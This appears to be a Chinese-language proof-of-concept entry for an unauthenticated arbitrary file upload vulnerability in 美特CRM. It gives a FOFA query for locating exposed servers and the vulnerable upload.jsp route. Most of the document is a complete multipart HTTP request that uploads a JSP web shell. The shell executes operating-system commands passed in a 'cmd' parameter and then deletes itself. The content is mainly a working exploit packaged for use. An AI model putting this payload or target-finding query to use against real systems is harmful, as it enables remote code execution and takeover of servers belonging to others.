B1-5美特-CRM-任意文件上传

漏洞描述：

美特CRM upload.jsp接口存在文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传恶意后门文件，执行任意指令，从而获取服务器权限。

网站图片：

fofa语法：

body=“/common/scripts/basic.js”

漏洞复现：

漏洞路由位置：http://your-ip//develop/systparam/softlogo/file2.jsp
payload：

效果图：

出现文件上传接口则存在漏洞

上传webshell，点提交抓包
payload：

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1
Host: your-ip
Content-Length: 995
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="rce.jsp"
Content-Type: application/octet-stream

<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

效果图：

响应体会回显完整路径
效果图：